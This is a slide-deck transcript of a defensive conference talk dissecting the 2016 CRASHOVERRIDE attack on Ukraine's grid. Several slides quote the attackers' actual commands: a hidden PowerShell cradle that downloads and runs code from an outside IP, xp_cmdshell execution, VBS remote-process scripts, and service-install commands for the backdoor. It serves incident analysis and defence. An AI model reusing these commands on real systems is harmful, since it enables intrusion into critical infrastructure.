Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
0 likes497 views
The document outlines a cyberattack on Ukraine's grid operations on December 17, 2016, detailing how malware was used to disrupt services and manipulate infrastructure control systems (ICS). It describes the attack's methodology, including the use of remote access, credential harvesting, and custom scripts, as well as the deployment of backdoors and destruction of critical system files. Recommendations for prevention and mitigation emphasize improved network visibility, securing credentials, and establishing robust response plans.
![powershell.exe -nop -w hidden -c $l=new-
object
net.webclient;$l.proxy=[Net.WebRequest]::Ge
tSystemWebProxy();$l.Proxy.Credentials=[Net
.CredentialCache]::DefaultCredentials;IEX
$l.downloadstring('http://188.42.253.43:880
1/msupdate');](https://image.slidesharecdn.com/slowik-vb2018-crashoverride-181016222948/85/Anatomy-of-an-Attack-Detecting-and-Defeating-CRASHOVERRIDE-24-320.jpg)
![[*ServerName: ABB.IEC61850_OPC_DA_Server.Instance[3].1*]
[State: After ON]
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI10PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI11PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI12PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI1PosstVal
Quality: 192 value: 2
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI2PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI3PosstVal
Quality: 192 value: 2
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI4PosstVal
Quality: 192 value: 1
OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI7PosstVal
Quality: 192 value: 2](https://image.slidesharecdn.com/slowik-vb2018-crashoverride-181016222948/85/Anatomy-of-an-Attack-Detecting-and-Defeating-CRASHOVERRIDE-40-320.jpg)
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
- 6. • Event Background • Initial Intrusion • ICS Effects • Conclusions
- 7. • First (only?) publicly-known malware targeting grid operations • Designed to: • Disrupt grid operations • Impede grid recovery
- 8. • 17 Dec 2016, 23:53 Local Time: • Ukrenergo substation de- energizes • Resulted in outage for service area • Utility transferred into manual mode • Began restoring power in 30 minutes
- 10. • Event was seemingly well-documented… • Critical questions unanswered: • Penetration of ICS network • In-depth evaluation of ICS capability • Context to build up layered defense
- 12. • No ICS-specific malware deployed • Attack was manual in nature: • Adversary established remote access to engineering workstation • Manipulated controls to produce effect
- 13. • Significant alteration in tradecraft • Attack leveraged ICS-specific malware • Codifies specialist knowledge in software • Enables operations to scale
- 15. • Precise methodology unknown • Large-scale phishing events in Ukraine in January 2016 • First definite indications of activity within network: October 2016
- 16. • Adversary begins manipulating ICS network devices 01 December 2016 • Creates attacker-controlled accounts: • Admin • Система (‘System’) • Attempts remote access to multiple systems with credentials
- 17. • Environment contained 3 MS-SQL servers • Connected to production equipment • Likely serving as data historians within the victim environment • First accessed on 12 December 2016
- 18. • Subsequent activity focuses on using SQL Servers to interact with environment • Extensive use of MS-SQL commands for command execution: EXEC xp_cmdshell <command>
- 19. EXEC xp_cmdshell 'net use L: <TargetIP>$C <Password> /USER:<Domain><User>’; EXEC xp_cmdshell 'move C:Deltam32.txt C:Deltam32.exe’; EXEC xp_cmdshell 'netstat -an';
- 20. • Use of Mimikatz for credential capture • Two variants: • Compiled version of Github repo • Same, but UPX packed • Credential capture and re-use critical to intrusion
- 21. • Once within network and possessing credentials: • File movement utilized NET utilities • Captured credentials allowed for remote access and file copying
- 22. • XP_CMDSHELL used for code execution on SQL Servers • Code execution on other devices leveraged various remote means: • Scripts • PSExec
- 23. • Use of custom BAT scripts: • Process execution • System survey and recon • Attack pre-positioning • General avoidance of malware
- 24. powershell.exe -nop -w hidden -c $l=new- object net.webclient;$l.proxy=[Net.WebRequest]::Ge tSystemWebProxy();$l.Proxy.Credentials=[Net .CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://188.42.253.43:880 1/msupdate');
- 25. Function RunRemoteProcess(Command) Set objStartup = objSWbemServices.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Set objProcess = objSWbemServices.Get("Win32_Process") strCmd = "cmd.exe /c " & Command & " >> " & GetReportFile() intReturn = objProcess.Create(strCmd, Null, objConfig, intProcessID) If intReturn <> 0 Then Wscript.Echo "Process could not be created." & _ vbNewLine & "Command line: " & strCmd & _ vbNewLine & "Return value: " & intReturn RunRemoteProcess = 2 Exit Function
- 26. cscript C:Backinfoufn.vbs <TargetIP 1> "C:BackinfoImapiService.exe" "C:Deltasvchost.exe" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo104.dll" "C:Delta104.dll" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo140.ini" "C:Delta104.ini" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfohaslo.dat" "C:Deltahaslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "dir C:Delta" cscript C:Backinfoufn.vbs <TargetIP 2> "C:BackinfoImapiService.exe" "C:Deltasvchost.exe" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo104.dll" "C:Delta104.dll" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo128.ini" "C:Delta104.ini" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfohaslo.dat" "C:Deltahaslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "dir C:Delta" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfodefragsvc.exe" "C:D2svchost.exe" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo104.dll" "C:D2104.dll" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo5.ini" "C:D2104.ini" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfohaslo.dat" "C:D2haslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "dir C:D2"
- 27. • Little to no use of obfuscation • Scripts are clearly written, functionality easily understood • With visibility, easy to detect
- 28. • Extensive use of Windows Sysinternals PSExec utility • However: • Used an older version – 2.11 • Released April 2014 • Latest version at time of attack was 2.2
- 29. • Designed and deployed a custom backdoor • Unnecessary given observed events • Provides basic RAT functionality • No built-in information gathering/exfil capability
- 31. • Backdoor compiled and deployed long after network intrusion • Capabilities provided already included in TTPs covered previously • Purpose for deployment unknown
- 33. • Deployment based on prior steps • Deploy via XP_CMDSHELL from SQL servers • Use credentials to remotely copy files • Scripted remote process execution to launch payloads
- 34. cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "sc config ImapiService binPath= 'C:Deltasvchost.exe C:Delta 104.dll 104.ini' start= auto && sc start ImapiService" cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "sc config ImapiService binPath= 'C:Deltasvchost.exe C:Delta 104.dll 104.ini' start= auto && sc start ImapiService" cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "sc config defragsvc binPath= 'C:D2svchost.exe C:D2 104.dll 104.ini' start= auto && sc start defragsvc"
- 35. • CRASHOVERRIDE execution starts with a dedicated launcher EXE • One stand-alone exception • Serves to: • Initiate payload, manage execution • Clean up and terminate
- 37. • Four modules targeting different ICS communication protocols: • IEC-101 • IEC-104 • IEC-61850 • OPC
- 38. • Different modules, but similar purpose • Goal: • Manipulate breakers and switch gear • Interrupt power distribution • Basically: turn things on/off (open/closed)
- 39. • Configuration files for some payloads indicate 80+ targets • Log file results indicate over 100 potential targets • Manual operations would not work for this level of impact
- 40. [*ServerName: ABB.IEC61850_OPC_DA_Server.Instance[3].1*] [State: After ON] OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI10PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI11PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI12PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI1PosstVal Quality: 192 value: 2 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI2PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI3PosstVal Quality: 192 value: 2 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI4PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI7PosstVal Quality: 192 value: 2
- 43. • Following grid impact, CRASHOVERRIDE moves to a new destructive stage • After a hard-coded wait time: • Destructive component launched • Specified in launcher component
- 44. Registry •Zeroes registry key ImagePath for critical services •Makes system unbootable Files •Erases ICS configuration files •Erases other file extensions Kills Processes • Kill the machine
- 45. • Finally – a denial of service stand-alone identified • Targets a Siemens SIPROTEC vulnerability from 2015: • CVE-2015-5374 • DoS via specially-crafted packet to UDP 50000
- 46. • EXE created with hard-coded target IP addresses • Only useful in the target environment • BUT: • Improper byte conversion applied for IP addresses • Results in IPs shifted in reverse when setting up sockets
- 47. • CRASHOVERRIDE attack part of a long- running intrusion • Attack avoided “malware” until final stages • Primary use of native system utilities and credential capture
- 48. • CRASHOVERRIDE provides an attack framework • BUT – exact attack will not be replicated • Instead: • Attack methodology will be re-used • Underlying behaviors will maintain similarity
- 49. Prevention • Protect Logon Info • Isolate and Segregate Networks Detection • Improve Host Visibility in ICS • Use Network Visibility to Detect Lateral Movement Mitigation • Implement Bastion Hosts • Structure Defense to Respond Earlier in Kill Chain Recovery • Develop and Rehearse Response Plans • Secure Storage of Backup Project Files